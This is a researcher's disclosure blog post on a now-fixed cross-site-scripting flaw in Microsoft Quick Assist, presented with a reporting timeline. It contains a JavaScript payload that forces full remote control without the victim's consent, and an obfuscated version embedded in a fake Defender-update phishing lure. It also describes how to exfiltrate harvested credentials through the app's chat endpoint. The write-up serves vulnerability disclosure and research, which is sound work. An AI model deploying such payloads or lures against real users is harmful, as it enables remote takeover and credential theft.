<!doctype html>







<html
  class="not-ready lg:text-base"
  style="--bg:#faf8f1"
  lang="en-us"
  dir="ltr"
><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta
    name="viewport"
    content="width=device-width, initial-scale=1, shrink-to-fit=no"
  />

  
  <title>Advanced Microsoft Phishing with a QuickAssist XSS - MrSheepSheep&#39;s curiosities</title>

  
  <meta name="theme-color" />

  <meta name="description" content="Earlier this year, Microsoft published an blog about TA Storm-1811 using Quick Assist to conduct targeted social engineering attacks and deploy Black Basta ransomware.
https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/
The full attack scenario is quite long, but could have been easier to execute a few months earlier.
Indeed, in October 2023, during redteam research, I discovered and reported a cross-site-scripting vulnerability in QuickAssist that could allow an attacker to bypass consent prompts in QuickAssist andtake full control over the computer without approval from the victim." />
  <meta name="author" content="Alexandre Souleau" /><link rel="preload stylesheet" as="style" href="http://localhost:1313/main.min.css" />

  
  <link rel="preload" as="image" href="http://localhost:1313/theme.svg" />

  <link rel="preload" as="image" href="https://avatars.githubusercontent.com/u/4931825?v=4" />

  <link rel="preload" as="image" href="http://localhost:1313/twitter.svg" /><link rel="preload" as="image" href="http://localhost:1313/github.svg" /><link rel="preload" as="image" href="http://localhost:1313/linkedin.svg" />

  <script
    defer
    src="http://localhost:1313/highlight.min.js"
    onload="hljs.initHighlightingOnLoad();"
  ></script>

  
  <link
    rel="icon"
    href="http://localhost:1313/favicon.ico"
  />
  <link
    rel="apple-touch-icon"
    href="http://localhost:1313/apple-touch-icon.png"
  />

  <meta name="generator" content="Hugo 0.131.0">
</head>
<body
    class="bg-(--bg) text-black antialiased duration-200 ease-out [-webkit-tap-highlight-color:transparent] dark:text-white"
  ><header
  class="mx-auto flex h-[4.5rem] max-w-(--w) px-8 whitespace-nowrap lg:justify-center"
>
  <div class="relative z-50 flex items-center ltr:mr-auto rtl:ml-auto">
    <a
      class="-translate-y-[1px] text-2xl font-medium"
      href="http://localhost:1313/"
      >MrSheepSheep&#39;s curiosities</a
    >
    <div
      class="btn-dark text-[0px] ltr:ml-4 rtl:mr-4 h-6 w-6 shrink-0 cursor-pointer [background:url(./theme.svg)_left_center/cover_no-repeat] dark:invert dark:[background-position:right]"
      role="button"
      aria-label="Dark"
    ></div>
  </div>

  <div
    class="btn-menu relative z-50 flex h-[4.5rem] w-[5rem] shrink-0 cursor-pointer flex-col items-center justify-center gap-2.5 lg:hidden ltr:-mr-8 rtl:-ml-8"
    role="button"
    aria-label="Menu"
  ></div>

  <script>
    
    const htmlClass = document.documentElement.classList;
    setTimeout(() => {
      htmlClass.remove('not-ready');
    }, 10);

    
    const btnMenu = document.querySelector('.btn-menu');
    btnMenu.addEventListener('click', () => {
      htmlClass.toggle('open');
    });

    
    const metaTheme = document.querySelector('meta[name="theme-color"]');
    const lightBg = '#faf8f1'.replace(/"/g, '');
    const setDark = (isDark) => {
      metaTheme.setAttribute('content', isDark ? '#000' : lightBg);
      htmlClass[isDark ? 'add' : 'remove']('dark');
      localStorage.setItem('dark', isDark);
    };

    
    const darkScheme = window.matchMedia('(prefers-color-scheme: dark)');
    if (htmlClass.contains('dark')) {
      setDark(true);
    } else {
      const darkVal = localStorage.getItem('dark');
      setDark(darkVal ? darkVal === 'true' : darkScheme.matches);
    }

    
    darkScheme.addEventListener('change', (event) => {
      setDark(event.matches);
    });

    
    const btnDark = document.querySelector('.btn-dark');
    btnDark.addEventListener('click', () => {
      setDark(localStorage.getItem('dark') !== 'true');
    });
  </script>

  <div
    class="nav-wrapper fixed inset-x-0 top-full z-40 flex h-full flex-col justify-center bg-(--bg) pb-16 duration-200 select-none lg:static lg:h-auto lg:flex-row lg:bg-transparent! lg:pb-0 lg:transition-none"
  ><nav
      class="mt-12 flex justify-center space-x-10 lg:mt-0 lg:items-center ltr:lg:ml-14 rtl:space-x-reverse rtl:lg:mr-14 dark:invert"
    >
      <a
        class="h-7 w-7 text-[0px] [background:var(--url)_center_center/cover_no-repeat] lg:h-6 lg:w-6"
        style="--url: url(./twitter.svg)"
        href="https://twitter.com/MrSheepSheep"
        target="_blank"
        rel="me"
      >twitter</a>
      <a
        class="h-7 w-7 text-[0px] [background:var(--url)_center_center/cover_no-repeat] lg:h-6 lg:w-6"
        style="--url: url(./github.svg)"
        href="https://github.com/mrsheepsheep"
        target="_blank"
        rel="me"
      >github</a>
      <a
        class="h-7 w-7 text-[0px] [background:var(--url)_center_center/cover_no-repeat] lg:h-6 lg:w-6"
        style="--url: url(./linkedin.svg)"
        href="https://linkedin.com/in/alexandresouleau"
        target="_blank"
        rel="me"
      >linkedin</a>
    </nav>
  </div>
</header>
<main
      class="prose prose-neutral dark:prose-invert relative mx-auto min-h-[calc(100vh-9rem)] max-w-(--w) px-8 pt-14 pb-16"
    ><article>
  <header class="mb-14">
    <h1 class="my-0! pb-2.5">Advanced Microsoft Phishing with a QuickAssist XSS</h1><div class="text-xs antialiased opacity-60"><time>Nov 14, 2024</time></div></header>

  <section><p>Earlier this year, Microsoft published an blog about TA Storm-1811 using Quick Assist to conduct targeted social engineering attacks and deploy Black Basta ransomware.</p>
<p><a href="https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/">https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/</a></p>
<p>The full attack scenario is quite long, but could have been easier to execute a few months earlier.</p>
<p>Indeed, in October 2023, during redteam research, I discovered and reported a cross-site-scripting vulnerability in QuickAssist that could allow an attacker to bypass consent prompts in QuickAssist andtake full control over the computer without approval from the victim.</p>
<p><strong>An attacker could :</strong></p>
<ul>
<li><strong>Change its display name to spoof official Microsoft agents or anyone else</strong></li>
<li><strong>Execute javascript code on the victim’s Webview2 browser running QuickAssist, and communicate with the native app (and potentially exploit local vulnerabilities from there, if any)</strong></li>
<li><strong>Bypass consent prompts, especially the “Full Control” prompt required to remotely control the victim’s desktop</strong></li>
</ul>
<h4 id="context">Context</h4>
<p>QuickAssist is a Webview2 built-in Windows utility to help someone by remotely viewing their desktop and eventually taking full control of their workstation to troubleshoot issues.</p>
<p>The helper must first send 6-long alphanumeric code to the perso who needs help (the sharer).</p>
<p>When run in normal operations, QuickAssist will display the following consent message to the sharer (on the left):</p>
<p><img src="images/image-0.png" alt="image-0.png"></p>
<p>Once the sharing has started, the helper cannot take control over the sharer’s desktop unless another consent request is approved by the sharer, as shown in the screenshot below :</p>
<p><img src="images/image-1.png" alt="image-0.png"></p>
<h4 id="exploitation">Exploitation</h4>
<p>This exploit is a combination of multiple issues (at the time) on the script REDACTED</p>
<p>Below is a preview of the script :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">/* Minification failed. Returning unminified contents.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(3828,44-45): run-time error JS1195: Expected expression: .
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(3828,55-56): run-time error JS1003: Expected &#39;:&#39;: )
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(3828,57-59): run-time error JS1195: Expected expression: ||
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(3828,64-65): run-time error JS1006: Expected &#39;)&#39;: ;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12020,48-49): run-time error JS1195: Expected expression: .
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12020,59-60): run-time error JS1195: Expected expression: .
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12020,67-68): run-time error JS1003: Expected &#39;:&#39;: )
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12021,25-28): run-time error JS1009: Expected &#39;}&#39;: var
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12021,25-28): run-time error JS1003: Expected &#39;:&#39;: var
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12021,139-140): run-time error JS1006: Expected &#39;)&#39;: ;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12040,9-10): run-time error JS1194: Expected &#39;,&#39; or &#39;]&#39;: }
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12040,9-10): run-time error JS1006: Expected &#39;)&#39;: }
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12041,5-6): run-time error JS1195: Expected expression: ]
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">(12041,6-7): run-time error JS1195: Expected expression: )
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"> */</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Copyright (c) Microsoft Corporation. All rights reserved.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">//namespaced scoped constants
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">var</span> <span style="color:#a6e22e">microsoft</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">microsoft</span> <span style="color:#f92672">||</span> {};
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span> <span style="color:#f92672">||</span> {};
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// This value has been defined as the result of a script include before angular
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">// we&#39;ll &#39;inject&#39; it here so that we can mock config for testing
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">// add fallback for headless js testing
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">config</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">config</span> <span style="color:#f92672">||</span> {};
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">moduleName</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">moduleName</span> <span style="color:#f92672">||</span> <span style="color:#e6db74">&#39;RemoteAssistanceWeb&#39;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// namespace scoped constants
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">try</span> {
</span></span><span style="display:flex;"><span>    document.<span style="color:#a6e22e">domain</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;microsoft.com&#39;</span>;
</span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">catch</span> (<span style="color:#a6e22e">e</span>) {
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// TODO: blocked on logging this until we rebuild the client telemetry outside of angular (task #1516344)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// add fallback for older browsers 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#a6e22e">console</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">console</span> <span style="color:#f92672">||</span> {};
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span> <span style="color:#f92672">||</span> <span style="color:#66d9ef">function</span> () { };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>(<span style="color:#66d9ef">function</span> () {
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// safeApply to avoid &#39;digest already in progress&#39; error
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#a6e22e">angular</span>.<span style="color:#a6e22e">module</span>(<span style="color:#e6db74">&#39;ng&#39;</span>).<span style="color:#a6e22e">run</span>([<span style="color:#e6db74">&#39;$rootScope&#39;</span>, <span style="color:#e6db74">&#39;$log&#39;</span>, <span style="color:#66d9ef">function</span> (<span style="color:#a6e22e">$rootScope</span>, <span style="color:#a6e22e">$log</span>) {
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">$rootScope</span>.<span style="color:#a6e22e">safeApply</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">function</span> (<span style="color:#a6e22e">fn</span>) {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">var</span> <span style="color:#a6e22e">phase</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">this</span>.<span style="color:#a6e22e">$root</span>.<span style="color:#a6e22e">$$phase</span>;
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">phase</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;$apply&#39;</span> <span style="color:#f92672">||</span> <span style="color:#a6e22e">phase</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;$digest&#39;</span>) {
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">fn</span> <span style="color:#f92672">&amp;&amp;</span> (<span style="color:#66d9ef">typeof</span> (<span style="color:#a6e22e">fn</span>) <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;function&#39;</span>)) {
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">fn</span>();
</span></span><span style="display:flex;"><span>                }
</span></span><span style="display:flex;"><span>            } <span style="color:#66d9ef">else</span> {
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">this</span>.<span style="color:#a6e22e">$apply</span>(<span style="color:#a6e22e">fn</span>);
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">// Check the environment -- native vs web browser
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>        <span style="color:#a6e22e">$rootScope</span>.<span style="color:#a6e22e">isWebView2</span> <span style="color:#f92672">=</span> (<span style="color:#66d9ef">typeof</span> window.<span style="color:#a6e22e">chrome</span> <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#39;undefined&#39;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#66d9ef">typeof</span> window.<span style="color:#a6e22e">chrome</span>.<span style="color:#a6e22e">webview</span> <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#39;undefined&#39;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#e6db74">&#39;postMessage&#39;</span> <span style="color:#66d9ef">in</span> window.<span style="color:#a6e22e">chrome</span>.<span style="color:#a6e22e">webview</span>);
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">$rootScope</span>.<span style="color:#a6e22e">isNative</span> <span style="color:#f92672">=</span> (<span style="color:#66d9ef">typeof</span> window <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#39;undefined&#39;</span> <span style="color:#f92672">&amp;&amp;</span>
</span></span><span style="display:flex;"><span>            ((<span style="color:#66d9ef">typeof</span> window.<span style="color:#a6e22e">external</span> <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#39;undefined&#39;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#e6db74">&#39;notify&#39;</span> <span style="color:#66d9ef">in</span> window.<span style="color:#a6e22e">external</span>) <span style="color:#f92672">||</span> <span style="color:#a6e22e">$rootScope</span>.<span style="color:#a6e22e">isWebView2</span>));
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">$rootScope</span>.<span style="color:#a6e22e">isHosted</span> <span style="color:#f92672">=</span> window.<span style="color:#a6e22e">parent</span> <span style="color:#f92672">&amp;&amp;</span> (window.<span style="color:#a6e22e">location</span> <span style="color:#f92672">!==</span> window.<span style="color:#a6e22e">parent</span>.<span style="color:#a6e22e">location</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">$rootScope</span>.<span style="color:#a6e22e">isNative</span>) {
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">passcodeLength</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">passcodeLengthCrypto</span>;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">$log</span>.<span style="color:#a6e22e">logt</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">function</span> (<span style="color:#a6e22e">message</span>) {
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">$log</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#39;[&#39;</span> <span style="color:#f92672">+</span> <span style="color:#66d9ef">new</span> Date().<span style="color:#a6e22e">toLocaleTimeString</span>() <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;] &#39;</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">message</span>);
</span></span><span style="display:flex;"><span>        };
</span></span><span style="display:flex;"><span>    }]);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// Creates angular module
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">var</span> <span style="color:#a6e22e">app</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">angular</span>.<span style="color:#a6e22e">module</span>(<span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">moduleName</span>, [<span style="color:#e6db74">&#39;authAngular&#39;</span>, <span style="color:#e6db74">&#39;angularjsrouting&#39;</span>, <span style="color:#e6db74">&#39;ngAria&#39;</span>, <span style="color:#e6db74">&#39;ngRoute&#39;</span>, <span style="color:#e6db74">&#39;ngCookies&#39;</span>, <span style="color:#e6db74">&#39;ngSanitize&#39;</span>, <span style="color:#e6db74">&#39;ngAnimate&#39;</span>, <span style="color:#e6db74">&#39;angular-md5&#39;</span>]);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">app</span>.<span style="color:#a6e22e">value</span>(<span style="color:#e6db74">&#39;clientConfig&#39;</span>, <span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">config</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">app</span>.<span style="color:#a6e22e">config</span>([<span style="color:#e6db74">&#39;$compileProvider&#39;</span>, <span style="color:#e6db74">&#39;$qProvider&#39;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">function</span> (<span style="color:#a6e22e">$compileProvider</span>, <span style="color:#a6e22e">$qProvider</span>) {
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">$compileProvider</span>.<span style="color:#a6e22e">debugInfoEnabled</span>(<span style="color:#f92672">!!</span><span style="color:#a6e22e">microsoft</span>.<span style="color:#a6e22e">remoteAssistance</span>.<span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">enableDebugging</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">$compileProvider</span>.<span style="color:#a6e22e">aHrefSanitizationWhitelist</span>(<span style="color:#e6db74">/^\s*(https?|itms\-apps|ftp|mailto|file|javascript|microsoft-edge|ms-windows-store|ms-quick-assist):/</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#75715e">// in angular 1.6, unhandled reject exceptions wherer introduced. I am disabling this feature. It causes failures
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>            <span style="color:#a6e22e">$qProvider</span>.<span style="color:#a6e22e">errorOnUnhandledRejections</span>(<span style="color:#66d9ef">false</span>);
</span></span><span style="display:flex;"><span>    }]);
</span></span></code></pre></div><p>First, JS (and CSS) minification errors could be seen at the beginning of the file, leading to cleartext developer comments in the script, as well as functions that should not have been shipped to production. This helps a lot understanding the code and looking for vulnerabilities.</p>
<p>Second, we can see that the javascript href protocol was added to the whitelist in <code>a</code>d tags using <a href="https://code.angularjs.org/1.8.2/docs/api/ng/provider/$compileProvider#aHrefSanitizationWhitelist">$compileProvider.aHrefSanitizationWhitelist</a>, essentially enabling <em>on(e) click</em> XSS at all <code>ng-bind-html</code> locations in the application.</p>
<p>The XSS injection point is located inside the <code>displayName</code> variable that is being sent to the victim upon initializing the session.</p>
<p>First, the attacker must prepare the Quick Assist session to store the XSS payload to send to its victim.</p>
<p>Without diving too deep into the technical details, the easiest way I’ve found to successfully inject into the displayName value is to intercept the HTTP <strong>response</strong> received <strong>after</strong> sending a POST request to the following URL :</p>
<pre tabindex="0"><code>https://remoteassistance.support.services.microsoft.com/api/v2.0/remoteassistance/createconsumersession
</code></pre><p><img src="images/image-2.png" alt="image-0.png"></p>
<p>By intercepting the response, we can easily change values before they are stored in Javascript and sent in further requests and websocket messages.</p>
<p>The attacker must then ask its victim to initiate a remote assistance session using the attacker’s code, retrieved in the previous response. For example, the attacker could send a phishing email asking the user to install a critical security update by running QuickAssist and entering a specific code. It could also be provided during a tech-support scam call.</p>
<p>As soon as the victim enters the code and completes the first connection steps, the malicious payload will be rendered on QuickAssist to trick the user into executing the XSS.</p>
<p>Here is an example :</p>
<p><img src="images/image-3.png" alt="image-0.png"></p>
<p>By playing with existing CSS rules and HTML, we can completely hide the original consent prompt to display any phishing message.</p>
<p>The displayed message contains a very basic malicious <code>a</code> tag which uses the <code>javascript:</code> scheme to run Javascript when clicked :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">javascript:alert()</span>&gt;Click me to alert()&lt;/<span style="color:#f92672">a</span>&gt;
</span></span></code></pre></div><h4 id="proofs-of-concept">Proofs-of-concept</h4>
<p><strong>Full demo</strong></p>
<p>Left pane is the attacker, right pane is the victim. Attacker trafic is intercepted and forged manually using Burpsuite, but the whole setup could have been fully automated.</p>
<p><img src="images/image-4.gif" alt="image-4.gif"></p>
<p><strong>FullControl consent bypass</strong></p>
<p>The following javascript payload can be used to proceed with the sharing request and force the victim to set the sharing mode to “FullControl” without its consent.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span>document.<span style="color:#a6e22e">querySelector</span>(<span style="color:#e6db74">&#39;button&#39;</span>).<span style="color:#a6e22e">click</span>();
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">setInterval</span>(<span style="color:#a6e22e">_</span>=&gt;{window.<span style="color:#a6e22e">chrome</span>.<span style="color:#a6e22e">webview</span>.<span style="color:#a6e22e">postMessage</span>(<span style="color:#a6e22e">angular</span>.<span style="color:#a6e22e">toJson</span>({<span style="color:#a6e22e">command</span><span style="color:#f92672">:</span><span style="color:#e6db74">&#39;setsharingmode&#39;</span>,<span style="color:#a6e22e">context</span><span style="color:#f92672">:</span>{<span style="color:#a6e22e">sharingmode</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;FullControl&#39;</span>}}))},<span style="color:#ae81ff">1000</span>)
</span></span></code></pre></div><p><em>Note that it is possible to send any other command available in QuickAssist native app using this method.</em></p>
<p>The full “FirstName” payload used in the video is below :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;FirstName&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#e6db74">&#34;&lt;table width=\&#34;100%\&#34; class=\&#34;ra-report-table absolute-center tooltip jumbotron \&#34; height=\&#34;100%\&#34;&gt;&lt;tbody bgcolor=\&#34;#ffffff\&#34;&gt;&lt;tr height=\&#34;550px\&#34;&gt;&lt;th&gt;&lt;a href=\&#34;javascript:eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,98,117,116,116,111,110,39,41,46,99,108,105,99,107,40,41,59,13,10,115,101,116,73,110,116,101,114,118,97,108,40,95,61,62,123,119,105,110,100,111,119,46,99,104,114,111,109,101,46,119,101,98,118,105,101,119,46,112,111,115,116,77,101,115,115,97,103,101,40,97,110,103,117,108,97,114,46,116,111,74,115,111,110,40,123,99,111,109,109,97,110,100,58,39,115,101,116,115,104,97,114,105,110,103,109,111,100,101,39,44,99,111,110,116,101,120,116,58,123,115,104,97,114,105,110,103,109,111,100,101,58,32,39,70,117,108,108,67,111,110,116,114,111,108,39,125,125,41,41,125,44,49,48,48,48,41))\&#34; class\&#34;\&#34;=\&#34;\&#34;&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;h1 class=\&#34;alert alert-error\&#34;&gt;Security warning&lt;\/h1&gt;&lt;p&gt;Quick Assist has detected that Microsoft Defender antivirus definitions are not up to date.&lt;\/p&gt;&lt;\/a&gt;&lt;br&gt;&lt;a class=\&#34;btn btn-primary\&#34;&gt;Install updates&lt;\/a&gt;&lt;\/th&gt;&lt;\/tr&gt;&lt;\/tbody&gt;&lt;\/table&gt;&#34;</span>
</span></span></code></pre></div><p><strong>Credentials phishing and exfiltration</strong></p>
<p>After triggering the XSS, a form can be added to the page to harvest credentials from QuickAssist window.</p>
<p>It is possible to exfiltrate harvested credentials via <code>remoteassistanceprodacs.communication.azure.com</code> since the communication channel is already established and it is allowed by CORS.</p>
<p>The JWT token and joinUri can be retrieved from <code>localStorage</code> to build an authenticated POST request to <a href="https://remoteassistanceprodacs.communication.azure.com/chat/threads/%7BjoinUri%7D/messages?api-version=2021-09-07%60">https://remoteassistanceprodacs.communication.azure.com/chat/threads/{joinUri}/messages?api-version=2021-09-07</a> , send the message, then retrieve it on the attacker’s side by sending an authenticated GET request to the same endpoint using their own credentials.</p>
<h4 id="timeline">Timeline</h4>
<ul>
<li>September 2023 : Discovery</li>
<li>18/10/2023 : MSRC Report</li>
<li>7/11/2023 : MSRC confirms vulnerability</li>
<li>10/11/2023 : $1000 bounty awarded (no CVE assigned)</li>
<li>Sometime early 2024 : Vulnerability fixed</li>
</ul>
</section>

  <footer class="mt-12 flex flex-wrap"><a
      class="mb-1.5 rounded-lg bg-black/[3%] px-5 py-1 no-underline hover:bg-black/[6%] ltr:mr-1.5 rtl:ml-1.5 dark:bg-white/[8%] dark:hover:bg-white/[12%]"
      href="http://localhost:1313/tags/phishing"
      >Phishing</a
    ><a
      class="mb-1.5 rounded-lg bg-black/[3%] px-5 py-1 no-underline hover:bg-black/[6%] ltr:mr-1.5 rtl:ml-1.5 dark:bg-white/[8%] dark:hover:bg-white/[12%]"
      href="http://localhost:1313/tags/microsoft"
      >Microsoft</a
    ></footer><nav
    class="mt-24 flex overflow-hidden rounded-xl bg-black/[3%] text-lg leading-[1.2]! *:flex *:w-1/2 *:items-center *:p-5 *:font-medium *:no-underline dark:bg-white/[8%] [&>*:hover]:bg-black/[2%] dark:[&>*:hover]:bg-white/[3%]"
  ><a class="ltr:pr-3 rtl:pl-3" href="http://localhost:1313/posts/docker-xss-rce/"
      ><span class="ltr:mr-1.5 rtl:ml-1.5">←</span><span>Exploiting the Docker daemon from an XSS perspective</span></a
    ><a
      class="justify-end pl-3 ltr:ml-auto rtl:mr-auto"
      href="http://localhost:1313/posts/azure-data-factory/"
      ><span>Exploiting Azure Data Factory to reach on-premise assets</span><span class="ltr:ml-1.5 rtl:mr-1.5">→</span></a
    ></nav></article></main><footer
  class="mx-auto flex h-[4.5rem] max-w-(--w) items-center px-8 text-xs tracking-wider uppercase opacity-60"
>
  <div class="mr-auto">&copy;2025
    <a class="link" href="http://localhost:1313/">MrSheepSheep&#39;s curiosities</a></div>
  <a class="link mx-6" href="https://gohugo.io/" rel="noopener" target="_blank"
    >powered by hugo️️</a
  >️
  <a
    class="link"
    href="https://github.com/nanxiaobei/hugo-paper"
    rel="noopener"
    target="_blank"
    >hugo-paper</a
  >
</footer>
</body>
</html>
